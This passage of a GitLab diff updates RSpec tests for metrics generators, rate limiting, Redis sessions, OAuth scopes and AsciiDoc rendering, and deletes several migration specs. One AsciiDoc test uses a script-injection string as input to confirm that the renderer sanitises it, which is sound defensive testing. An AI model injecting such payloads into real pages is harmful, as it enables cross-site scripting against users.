"redis_hll_counters.test_category.i_test_event_weekly") expect(weekly_metric_definition["distribution"]).to include('ee') + expect(weekly_metric_definition["instrumentation_class"]).to eq('RedisHLLMetric') expect(monthly_metric_definition).to include("key_path" => "redis_hll_counters.test_category.i_test_event_monthly") expect(monthly_metric_definition["distribution"]).to include('ee') + expect(monthly_metric_definition["instrumentation_class"]).to eq('RedisHLLMetric') end end end diff --git a/spec/lib/generators/gitlab/usage_metric_definition_generator_spec.rb b/spec/lib/generators/gitlab/usage_metric_definition_generator_spec.rb index b67425ae012..6a30bcd0e2c 100644 --- a/spec/lib/generators/gitlab/usage_metric_definition_generator_spec.rb +++ b/spec/lib/generators/gitlab/usage_metric_definition_generator_spec.rb @@ -7,6 +7,7 @@ RSpec.describe Gitlab::UsageMetricDefinitionGenerator, :silence_stdout do let(:key_path) { 'counts_weekly.test_metric' } let(:dir) { '7d' } + let(:class_name) { 'Count' } let(:temp_dir) { Dir.mktmpdir } before do @@ -33,7 +34,7 @@ RSpec.describe Gitlab::UsageMetricDefinitionGenerator, :silence_stdout do let(:metric_definition_path) { Dir.glob(File.join(temp_dir, 'metrics/counts_7d/*_test_metric.yml')).first } it 'creates a metric definition file using the template' do - described_class.new([key_path], { 'dir' => dir }).invoke_all + described_class.new([key_path], { 'dir' => dir, 'class_name' => class_name }).invoke_all expect(YAML.safe_load(File.read(metric_definition_path))).to eq(sample_metric) end end @@ -48,14 +49,14 @@ RSpec.describe Gitlab::UsageMetricDefinitionGenerator, :silence_stdout do end it 'creates a metric definition file using the template' do - described_class.new([key_path], { 'dir' => dir, 'ee': true }).invoke_all + described_class.new([key_path], { 'dir' => dir, 'class_name' => class_name, 'ee': true }).invoke_all expect(YAML.safe_load(File.read(metric_definition_path))).to eq(sample_metric) end end end describe 
'Validation' do - let(:options) { [key_path, '--dir', dir] } + let(:options) { [key_path, '--dir', dir, '--class_name', class_name] } subject { described_class.start(options) } @@ -93,7 +94,7 @@ RSpec.describe Gitlab::UsageMetricDefinitionGenerator, :silence_stdout do describe 'Name suggestions' do it 'adds name key to metric definition' do expect(::Gitlab::Usage::Metrics::NamesSuggestions::Generator).to receive(:generate).and_return('some name') - described_class.new([key_path], { 'dir' => dir }).invoke_all + described_class.new([key_path], { 'dir' => dir, 'class_name' => class_name }).invoke_all metric_definition_path = Dir.glob(File.join(temp_dir, 'metrics/counts_7d/*_test_metric.yml')).first expect(YAML.safe_load(File.read(metric_definition_path))).to include("name" => "some name") @@ -104,7 +105,7 @@ RSpec.describe Gitlab::UsageMetricDefinitionGenerator, :silence_stdout do let(:key_paths) { ['counts_weekly.test_metric', 'counts_weekly.test1_metric'] } it 'creates multiple files' do - described_class.new(key_paths, { 'dir' => dir }).invoke_all + described_class.new(key_paths, { 'dir' => dir, 'class_name' => class_name }).invoke_all files = Dir.glob(File.join(temp_dir, 'metrics/counts_7d/*_metric.yml')) expect(files.count).to eq(2) diff --git a/spec/lib/gitlab/analytics/cycle_analytics/aggregated/records_fetcher_spec.rb b/spec/lib/gitlab/analytics/cycle_analytics/aggregated/records_fetcher_spec.rb index 045cdb129cb..55ba6e56237 100644 --- a/spec/lib/gitlab/analytics/cycle_analytics/aggregated/records_fetcher_spec.rb +++ b/spec/lib/gitlab/analytics/cycle_analytics/aggregated/records_fetcher_spec.rb @@ -41,6 +41,19 @@ RSpec.describe Gitlab::Analytics::CycleAnalytics::Aggregated::RecordsFetcher do it_behaves_like 'match returned records' end + context 'when intervalstyle setting is configured to "postgres"' do + it 'avoids nil durations' do + # ActiveRecord cannot parse the 'postgres' intervalstyle, it returns nil + # The setting is rolled back after the test case. 
+ Analytics::CycleAnalytics::IssueStageEvent.connection.execute("SET LOCAL intervalstyle='postgres'") + + records_fetcher.serialized_records do |relation| + durations = relation.map(&:total_time) + expect(durations).to all(be > 0) + end + end + end + context 'when sorting by end event ASC' do let(:expected_issue_ids) { [issue_2.iid, issue_1.iid, issue_3.iid] } diff --git a/spec/lib/gitlab/anonymous_session_spec.rb b/spec/lib/gitlab/anonymous_session_spec.rb index 245ca02e91a..64186e9003a 100644 --- a/spec/lib/gitlab/anonymous_session_spec.rb +++ b/spec/lib/gitlab/anonymous_session_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do +RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_sessions do let(:default_session_id) { '6919a6f1bb119dd7396fadc38fd18d0d' } let(:additional_session_id) { '7919a6f1bb119dd7396fadc38fd18d0d' } @@ -16,7 +16,7 @@ RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do it 'adds session id to proper key' do subject.count_session_ip - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.get("session:lookup:ip:gitlab2:127.0.0.1").to_i).to eq 1 end end @@ -25,7 +25,7 @@ RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do freeze_time do subject.count_session_ip - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.ttl("session:lookup:ip:gitlab2:127.0.0.1")).to eq(24.hours.to_i) end end @@ -36,7 +36,7 @@ RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do subject.count_session_ip new_anonymous_session.count_session_ip - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.get("session:lookup:ip:gitlab2:127.0.0.1").to_i).to eq(2) end end @@ -45,7 +45,7 @@ RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do describe '#stored_sessions' do 
it 'returns all anonymous sessions per ip' do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:lookup:ip:gitlab2:127.0.0.1", 2) end @@ -54,13 +54,13 @@ RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do end it 'removes obsolete lookup through ip entries' do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:lookup:ip:gitlab2:127.0.0.1", 2) end subject.cleanup_session_per_ip_count - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.exists("session:lookup:ip:gitlab2:127.0.0.1")).to eq(false) end end diff --git a/spec/lib/gitlab/application_context_spec.rb b/spec/lib/gitlab/application_context_spec.rb index ecd68caba79..5ecec978017 100644 --- a/spec/lib/gitlab/application_context_spec.rb +++ b/spec/lib/gitlab/application_context_spec.rb @@ -152,6 +152,38 @@ RSpec.describe Gitlab::ApplicationContext do end end end + + context 'when using a runner project' do + let_it_be_with_reload(:runner) { create(:ci_runner, :project) } + + it 'sets project path from runner project' do + context = described_class.new(runner: runner) + + expect(result(context)).to include(project: runner.runner_projects.first.project.full_path) + end + + context 'when the runner serves multiple projects' do + before do + create(:ci_runner_project, runner: runner, project: create(:project)) + end + + it 'does not set project path' do + context = described_class.new(runner: runner) + + expect(result(context)).to include(project: nil) + end + end + end + + context 'when using an instance runner' do + let_it_be(:runner) { create(:ci_runner, :instance) } + + it 'does not sets project path' do + context = described_class.new(runner: runner) + + expect(result(context)).to include(project: nil) + end + end end describe '#use' do diff --git a/spec/lib/gitlab/application_rate_limiter_spec.rb 
b/spec/lib/gitlab/application_rate_limiter_spec.rb index c74bcf8d678..20c89eab5f5 100644 --- a/spec/lib/gitlab/application_rate_limiter_spec.rb +++ b/spec/lib/gitlab/application_rate_limiter_spec.rb @@ -2,37 +2,37 @@ require 'spec_helper' -RSpec.describe Gitlab::ApplicationRateLimiter do +RSpec.describe Gitlab::ApplicationRateLimiter, :clean_gitlab_redis_rate_limiting do let_it_be(:user) { create(:user) } let_it_be(:project) { create(:project) } - subject { described_class } - - describe '.throttled?', :clean_gitlab_redis_rate_limiting do - let(:rate_limits) do - { - test_action: { - threshold: 1, - interval: 2.minutes - }, - another_action: { - threshold: 2, - interval: 3.minutes - } + let(:rate_limits) do + { + test_action: { + threshold: 1, + interval: 2.minutes + }, + another_action: { + threshold: 2, + interval: 3.minutes } - end + } + end - before do - allow(described_class).to receive(:rate_limits).and_return(rate_limits) - end + subject { described_class } + + before do + allow(described_class).to receive(:rate_limits).and_return(rate_limits) + end + describe '.throttled?' 
do context 'when the key is invalid' do context 'is provided as a Symbol' do context 'but is not defined in the rate_limits Hash' do it 'raises an InvalidKeyError exception' do key = :key_not_in_rate_limits_hash - expect { subject.throttled?(key) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) + expect { subject.throttled?(key, scope: [user]) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) end end end @@ -42,7 +42,7 @@ RSpec.describe Gitlab::ApplicationRateLimiter do it 'raises an InvalidKeyError exception' do key = rate_limits.keys[0].to_s - expect { subject.throttled?(key) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) + expect { subject.throttled?(key, scope: [user]) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) end end @@ -50,7 +50,7 @@ RSpec.describe Gitlab::ApplicationRateLimiter do it 'raises an InvalidKeyError exception' do key = 'key_not_in_rate_limits_hash' - expect { subject.throttled?(key) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) + expect { subject.throttled?(key, scope: [user]) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) end end end @@ -89,6 +89,17 @@ RSpec.describe Gitlab::ApplicationRateLimiter do expect(subject.throttled?(:another_action, scope: scope)).to eq(true) end end + + it 'allows peeking at the current state without changing its value' do + travel_to(start_time) do + expect(subject.throttled?(:test_action, scope: scope)).to eq(false) + 2.times do + expect(subject.throttled?(:test_action, scope: scope, peek: true)).to eq(false) + end + expect(subject.throttled?(:test_action, scope: scope)).to eq(true) + expect(subject.throttled?(:test_action, scope: scope, peek: true)).to eq(true) + end + end end context 'when using ActiveRecord models as scope' do @@ -104,6 +115,20 @@ RSpec.describe Gitlab::ApplicationRateLimiter do end end + describe '.peek' do + it 'peeks at the current state without changing its value' do + freeze_time 
do + expect(subject.peek(:test_action, scope: [user])).to eq(false) + expect(subject.throttled?(:test_action, scope: [user])).to eq(false) + 2.times do + expect(subject.peek(:test_action, scope: [user])).to eq(false) + end + expect(subject.throttled?(:test_action, scope: [user])).to eq(true) + expect(subject.peek(:test_action, scope: [user])).to eq(true) + end + end + end + describe '.log_request' do let(:file_path) { 'master/README.md' } let(:type) { :raw_blob_request_limit } diff --git a/spec/lib/gitlab/asciidoc_spec.rb b/spec/lib/gitlab/asciidoc_spec.rb index ac29bb22865..7200ff3c4db 100644 --- a/spec/lib/gitlab/asciidoc_spec.rb +++ b/spec/lib/gitlab/asciidoc_spec.rb @@ -96,10 +96,10 @@ module Gitlab it "does not convert dangerous fenced code with inline script into HTML" do input = '```mypre"><script>alert(3)</script>' output = - if Feature.enabled?(:use_cmark_renderer) - "<div>\n<div>\n<pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code></code></pre>\n</div>\n</div>" + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) + "<div>\n<div>\n<div class=\"gl-relative markdown-code-block js-markdown-code\">\n<pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code></code></pre>\n<copy-code></copy-code>\n</div>\n</div>\n</div>" else - "<div>\n<div>\n<pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code><span id=\"LC1\" class=\"line\" lang=\"plaintext\">\"></span></code></pre>\n</div>\n</div>" + "<div>\n<div>\n<div class=\"gl-relative markdown-code-block js-markdown-code\">\n<pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code><span id=\"LC1\" class=\"line\" lang=\"plaintext\">\"></span></code></pre>\n<copy-code></copy-code>\n</div>\n</div>\n</div>" end expect(render(input, context)).to include(output) @@ -365,7 +365,10 @@ module Gitlab 
output = <<~HTML <div> <div> + <div class="gl-relative markdown-code-block js-markdown-code"> <pre class="code highlight js-syntax-highlight language-javascript" lang="javascript" v-pre="true"><code><span id="LC1" class="line" lang="javascript"><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">hello world</span><span class="dl">'</span><span class="p">)</span></span></code></pre> + <copy-code></copy-code> + </div> </div> </div> HTML @@ -392,11 +395,14 @@ module Gitlab <div> <div>class.cpp</div> <div> + <div class="gl-relative markdown-code-block js-markdown-code"> <pre class="code highlight js-syntax-highlight language-cpp" lang="cpp" v-pre="true"><code><span id="LC1" class="line" lang="cpp"><span class="cp">#include <stdio.h></span></span> <span id="LC2" class="line" lang="cpp"></span> <span id="LC3" class="line" lang="cpp"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">5</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span></span> <span id="LC4" class="line" lang="cpp"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span><span class="o"><<</span><span class="s">"*"</span><span class="o"><<</span><span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span></span> <span id="LC5" class="line" lang="cpp"><span class="p">}</span></span></code></pre> + <copy-code></copy-code> + </div> </div> </div> HTML diff --git a/spec/lib/gitlab/auth/user_access_denied_reason_spec.rb b/spec/lib/gitlab/auth/user_access_denied_reason_spec.rb index 102d6fba97f..e5bc51edc2d 100644 --- a/spec/lib/gitlab/auth/user_access_denied_reason_spec.rb +++ 
b/spec/lib/gitlab/auth/user_access_denied_reason_spec.rb @@ -26,6 +26,7 @@ RSpec.describe Gitlab::Auth::UserAccessDeniedReason do it { is_expected.to match /must accept the Terms of Service/ } it { is_expected.to include(user.username) } + it { is_expected.to include(Gitlab.config.gitlab.url) } end context 'when the user is internal' do diff --git a/spec/lib/gitlab/auth_spec.rb b/spec/lib/gitlab/auth_spec.rb index 5ec6e23774a..32e647688ff 100644 --- a/spec/lib/gitlab/auth_spec.rb +++ b/spec/lib/gitlab/auth_spec.rb @@ -259,30 +259,48 @@ RSpec.describe Gitlab::Auth, :use_clean_rails_memory_store_caching do context 'while using OAuth tokens as passwords' do let(:user) { create(:user) } - let(:token_w_api_scope) { Doorkeeper::AccessToken.create!(application_id: application.id, resource_owner_id: user.id, scopes: 'api') } let(:application) { Doorkeeper::Application.create!(name: 'MyApp', redirect_uri: 'https://app.com', owner: user) } shared_examples 'an oauth failure' do it 'fails' do - expect(gl_auth.find_for_git_client("oauth2", token_w_api_scope.token, project: nil, ip: 'ip')) + access_token = Doorkeeper::AccessToken.create!(application_id: application.id, resource_owner_id: user.id, scopes: 'api') + + expect(gl_auth.find_for_git_client("oauth2", access_token.token, project: nil, ip: 'ip')) .to have_attributes(auth_failure) end end - it 'succeeds for OAuth tokens with the `api` scope' do - expect(gl_auth.find_for_git_client("oauth2", token_w_api_scope.token, project: nil, ip: 'ip')).to have_attributes(actor: user, project: nil, type: :oauth, authentication_abilities: described_class.full_authentication_abilities) - end + context 'with specified scopes' do + using RSpec::Parameterized::TableSyntax + + where(:scopes, :abilities) do + 'api' | described_class.full_authentication_abilities + 'read_api' | described_class.read_only_authentication_abilities + 'read_repository' | [:download_code] + 'write_repository' | [:download_code, :push_code] + 'read_user' | [] + 'sudo' 
| [] + 'openid' | [] + 'profile' | [] + 'email' | [] + end - it 'fails for OAuth tokens with other scopes' do - token = Doorkeeper::AccessToken.create!(application_id: application.id, resource_owner_id: user.id, scopes: 'read_user') + with_them do + it 'authenticates with correct abilities' do + access_token = Doorkeeper::AccessToken.create!(application_id: application.id, resource_owner_id: user.id, scopes: scopes) - expect(gl_auth.find_for_git_client("oauth2", token.token, project: nil, ip: 'ip')).to have_attributes(auth_failure) + expect(gl_auth.find_for_git_client("oauth2", access_token.token, project: nil, ip: 'ip')) + .to have_attributes(actor: user, project: nil, type: :oauth, authentication_abilities: abilities) + end + end end it 'does not try password auth before oauth' do + access_token = Doorkeeper::AccessToken.create!(application_id: application.id, resource_owner_id: user.id, scopes: 'api') + expect(gl_auth).not_to receive(:find_with_user_password) - gl_auth.find_for_git_client("oauth2", token_w_api_scope.token, project: nil, ip: 'ip') + gl_auth.find_for_git_client("oauth2", access_token.token, project: nil, ip: 'ip') end context 'blocked user' do diff --git a/spec/lib/gitlab/background_migration/add_merge_request_diff_commits_count_spec.rb b/spec/lib/gitlab/background_migration/add_merge_request_diff_commits_count_spec.rb deleted file mode 100644 index 1e72b249c19..00000000000 --- a/spec/lib/gitlab/background_migration/add_merge_request_diff_commits_count_spec.rb +++ /dev/null @@ -1,66 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::AddMergeRequestDiffCommitsCount do - let(:namespaces_table) { table(:namespaces) } - let(:projects_table) { table(:projects) } - let(:merge_requests_table) { table(:merge_requests) } - let(:merge_request_diffs_table) { table(:merge_request_diffs) } - let(:merge_request_diff_commits_table) { table(:merge_request_diff_commits) } - - let(:namespace) { 
namespaces_table.create!(name: 'gitlab-org', path: 'gitlab-org') } - let(:project) { projects_table.create!(name: 'gitlab', path: 'gitlab-org/gitlab-ce', namespace_id: namespace.id) } - let(:merge_request) do - merge_requests_table.create!(target_project_id: project.id, - target_branch: 'master', - source_project_id: project.id, - source_branch: 'mr name', - title: 'mr name') - end - - def create_diff!(name, commits: 0) - mr_diff = merge_request_diffs_table.create!( - merge_request_id: merge_request.id) - - commits.times do |i| - merge_request_diff_commits_table.create!( - merge_request_diff_id: mr_diff.id, - relative_order: i, sha: i) - end - - mr_diff - end - - describe '#perform' do - it 'migrates diffs that have no commits' do - diff = create_diff!('with_multiple_commits', commits: 0) - - subject.perform(diff.id, diff.id) - - expect(diff.reload.commits_count).to eq(0) - end - - it 'skips diffs that have commits_count already set' do - timestamp = 2.days.ago - diff = merge_request_diffs_table.create!( - merge_request_id: merge_request.id, - commits_count: 0, - updated_at: timestamp) - - subject.perform(diff.id, diff.id) - - expect(diff.reload.updated_at).to be_within(1.second).of(timestamp) - end - - it 'migrates multiple diffs to the correct values' do - diffs = Array.new(3).map.with_index { |_, i| create_diff!(i, commits: 3) } - - subject.perform(diffs.first.id, diffs.last.id) - - diffs.each do |diff| - expect(diff.reload.commits_count).to eq(3) - end - end - end -end diff --git a/spec/lib/gitlab/background_migration/add_modified_to_approval_merge_request_rule_spec.rb b/spec/lib/gitlab/background_migration/add_modified_to_approval_merge_request_rule_spec.rb deleted file mode 100644 index 0b29163671c..00000000000 --- a/spec/lib/gitlab/background_migration/add_modified_to_approval_merge_request_rule_spec.rb +++ /dev/null @@ -1,61 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 
Gitlab::BackgroundMigration::AddModifiedToApprovalMergeRequestRule, schema: 20181228175414 do - let(:determine_if_rules_are_modified) { described_class.new } - - let(:namespace) { table(:namespaces).create!(name: 'gitlab', path: 'gitlab') } - let(:projects) { table(:projects) } - let(:normal_project) { projects.create!(namespace_id: namespace.id) } - let(:overridden_project) { projects.create!(namespace_id: namespace.id) } - let(:rules) { table(:approval_merge_request_rules) } - let(:project_rules) { table(:approval_project_rules) } - let(:sources) { table(:approval_merge_request_rule_sources) } - let(:merge_requests) { table(:merge_requests) } - let(:groups) { table(:namespaces) } - let(:mr_groups) { table(:approval_merge_request_rules_groups) } - let(:project_groups) { table(:approval_project_rules_groups) } - - before do - project_rule = project_rules.create!(project_id: normal_project.id, approvals_required: 3, name: 'test rule') - overridden_project_rule = project_rules.create!(project_id: overridden_project.id, approvals_required: 5, name: 'other test rule') - overridden_project_rule_two = project_rules.create!(project_id: overridden_project.id, approvals_required: 7, name: 'super cool rule') - - merge_request = merge_requests.create!(target_branch: 'feature', source_branch: 'default', source_project_id: normal_project.id, target_project_id: normal_project.id) - overridden_merge_request = merge_requests.create!(target_branch: 'feature-2', source_branch: 'default', source_project_id: overridden_project.id, target_project_id: overridden_project.id) - - merge_rule = rules.create!(merge_request_id: merge_request.id, approvals_required: 3, name: 'test rule') - overridden_merge_rule = rules.create!(merge_request_id: overridden_merge_request.id, approvals_required: 6, name: 'other test rule') - overridden_merge_rule_two = rules.create!(merge_request_id: overridden_merge_request.id, approvals_required: 7, name: 'super cool rule') - - 
sources.create!(approval_project_rule_id: project_rule.id, approval_merge_request_rule_id: merge_rule.id) - sources.create!(approval_project_rule_id: overridden_project_rule.id, approval_merge_request_rule_id: overridden_merge_rule.id) - sources.create!(approval_project_rule_id: overridden_project_rule_two.id, approval_merge_request_rule_id: overridden_merge_rule_two.id) - - group1 = groups.create!(name: "group1", path: "test_group1", type: 'Group') - group2 = groups.create!(name: "group2", path: "test_group2", type: 'Group') - group3 = groups.create!(name: "group3", path: "test_group3", type: 'Group') - - project_groups.create!(approval_project_rule_id: overridden_project_rule_two.id, group_id: group1.id) - project_groups.create!(approval_project_rule_id: overridden_project_rule_two.id, group_id: group2.id) - project_groups.create!(approval_project_rule_id: overridden_project_rule_two.id, group_id: group3.id) - - mr_groups.create!(approval_merge_request_rule_id: overridden_merge_rule.id, group_id: group1.id) - mr_groups.create!(approval_merge_request_rule_id: overridden_merge_rule_two.id, group_id: group2.id) - end - - describe '#perform' do - it 'changes the correct rules' do - original_count = rules.all.count - - determine_if_rules_are_modified.perform(rules.minimum(:id), rules.maximum(:id)) - - results = rules.where(modified_from_project_rule: true) - - expect(results.count).to eq 2 - expect(results.collect(&:name)).to eq(['other test rule', 'super cool rule']) - expect(rules.count).to eq original_count - end - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_deployment_clusters_from_deployments_spec.rb b/spec/lib/gitlab/background_migration/backfill_deployment_clusters_from_deployments_spec.rb deleted file mode 100644 index 1404ada3647..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_deployment_clusters_from_deployments_spec.rb +++ /dev/null @@ -1,44 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - 
-RSpec.describe Gitlab::BackgroundMigration::BackfillDeploymentClustersFromDeployments, :migration, schema: 20181228175414 do - subject { described_class.new } - - describe '#perform' do - it 'backfills deployment_cluster for all deployments in the given range with a non-null cluster_id' do - deployment_clusters = table(:deployment_clusters) - - namespace = table(:namespaces).create!(name: 'the-namespace', path: 'the-path') - project = table(:projects).create!(name: 'the-project', namespace_id: namespace.id) - environment = table(:environments).create!(name: 'the-environment', project_id: project.id, slug: 'slug') - cluster = table(:clusters).create!(name: 'the-cluster') - - deployment_data = { cluster_id: cluster.id, project_id: project.id, environment_id: environment.id, ref: 'abc', tag: false, sha: 'sha', status: 1 } - expected_deployment_1 = create_deployment(**deployment_data) - create_deployment(**deployment_data, cluster_id: nil) # no cluster_id - expected_deployment_2 = create_deployment(**deployment_data) - out_of_range_deployment = create_deployment(**deployment_data, cluster_id: cluster.id) # expected to be out of range - - # to test "ON CONFLICT DO NOTHING" - existing_record_for_deployment_2 = deployment_clusters.create!( - deployment_id: expected_deployment_2.id, - cluster_id: expected_deployment_2.cluster_id, - kubernetes_namespace: 'production' - ) - - subject.perform(expected_deployment_1.id, out_of_range_deployment.id - 1) - - expect(deployment_clusters.all.pluck(:deployment_id, :cluster_id, :kubernetes_namespace)).to contain_exactly( - [expected_deployment_1.id, cluster.id, nil], - [expected_deployment_2.id, cluster.id, existing_record_for_deployment_2.kubernetes_namespace] - ) - end - - def create_deployment(**data) - @iid ||= 0 - @iid += 1 - table(:deployments).create!(iid: @iid, **data) - end - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_environment_id_deployment_merge_requests_spec.rb 
b/spec/lib/gitlab/background_migration/backfill_environment_id_deployment_merge_requests_spec.rb deleted file mode 100644 index 9194525e713..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_environment_id_deployment_merge_requests_spec.rb +++ /dev/null @@ -1,46 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillEnvironmentIdDeploymentMergeRequests, schema: 20181228175414 do - let(:environments) { table(:environments) } - let(:merge_requests) { table(:merge_requests) } - let(:deployments) { table(:deployments) } - let(:deployment_merge_requests) { table(:deployment_merge_requests) } - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - - subject(:migration) { described_class.new } - - it 'correctly backfills environment_id column' do - namespace = namespaces.create!(name: 'foo', path: 'foo') - project = projects.create!(namespace_id: namespace.id) - - production = environments.create!(project_id: project.id, name: 'production', slug: 'production') - staging = environments.create!(project_id: project.id, name: 'staging', slug: 'staging') - - mr = merge_requests.create!(source_branch: 'x', target_branch: 'master', target_project_id: project.id) - - deployment1 = deployments.create!(environment_id: staging.id, iid: 1, project_id: project.id, ref: 'master', tag: false, sha: '123abcdef', status: 1) - deployment2 = deployments.create!(environment_id: production.id, iid: 2, project_id: project.id, ref: 'master', tag: false, sha: '123abcdef', status: 1) - deployment3 = deployments.create!(environment_id: production.id, iid: 3, project_id: project.id, ref: 'master', tag: false, sha: '123abcdef', status: 1) - - # mr is tracked twice in production through deployment2 and deployment3 - deployment_merge_requests.create!(deployment_id: deployment1.id, merge_request_id: mr.id) - deployment_merge_requests.create!(deployment_id: deployment2.id, merge_request_id: mr.id) - 
deployment_merge_requests.create!(deployment_id: deployment3.id, merge_request_id: mr.id) - - expect(deployment_merge_requests.where(environment_id: nil).count).to eq(3) - - migration.backfill_range(1, mr.id) - - expect(deployment_merge_requests.where(environment_id: nil).count).to be_zero - expect(deployment_merge_requests.count).to eq(2) - - production_deployments = deployment_merge_requests.where(environment_id: production.id) - expect(production_deployments.count).to eq(1) - expect(production_deployments.first.deployment_id).to eq(deployment2.id) - - expect(deployment_merge_requests.where(environment_id: staging.id).count).to eq(1) - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_merge_request_cleanup_schedules_spec.rb b/spec/lib/gitlab/background_migration/backfill_merge_request_cleanup_schedules_spec.rb deleted file mode 100644 index d33f52514da..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_merge_request_cleanup_schedules_spec.rb +++ /dev/null @@ -1,53 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillMergeRequestCleanupSchedules, schema: 20181228175414 do - let(:merge_requests) { table(:merge_requests) } - let(:cleanup_schedules) { table(:merge_request_cleanup_schedules) } - let(:metrics) { table(:merge_request_metrics) } - - let(:namespace) { table(:namespaces).create!(name: 'name', path: 'path') } - let(:project) { table(:projects).create!(namespace_id: namespace.id) } - - subject { described_class.new } - - describe '#perform' do - let!(:open_mr) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master') } - - let!(:closed_mr_1) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master', state_id: 2) } - let!(:closed_mr_2) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master', state_id: 2) } - 
let!(:closed_mr_1_metrics) { metrics.create!(merge_request_id: closed_mr_1.id, target_project_id: project.id, latest_closed_at: Time.current, created_at: Time.current, updated_at: Time.current) } - let!(:closed_mr_2_metrics) { metrics.create!(merge_request_id: closed_mr_2.id, target_project_id: project.id, latest_closed_at: Time.current, created_at: Time.current, updated_at: Time.current) } - let!(:closed_mr_2_cleanup_schedule) { cleanup_schedules.create!(merge_request_id: closed_mr_2.id, scheduled_at: Time.current) } - - let!(:merged_mr_1) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master', state_id: 3) } - let!(:merged_mr_2) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master', state_id: 3, updated_at: Time.current) } - let!(:merged_mr_1_metrics) { metrics.create!(merge_request_id: merged_mr_1.id, target_project_id: project.id, merged_at: Time.current, created_at: Time.current, updated_at: Time.current) } - - let!(:closed_mr_3) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master', state_id: 2) } - let!(:closed_mr_3_metrics) { metrics.create!(merge_request_id: closed_mr_3.id, target_project_id: project.id, latest_closed_at: Time.current, created_at: Time.current, updated_at: Time.current) } - - it 'creates records for all closed and merged merge requests in range' do - expect(Gitlab::BackgroundMigration::Logger).to receive(:info).with( - message: 'Backfilled merge_request_cleanup_schedules records', - count: 3 - ) - - subject.perform(open_mr.id, merged_mr_2.id) - - aggregate_failures do - expect(cleanup_schedules.all.pluck(:merge_request_id)) - .to contain_exactly(closed_mr_1.id, closed_mr_2.id, merged_mr_1.id, merged_mr_2.id) - expect(cleanup_schedules.find_by(merge_request_id: closed_mr_1.id).scheduled_at.to_s) - .to eq((closed_mr_1_metrics.latest_closed_at + 14.days).to_s) - 
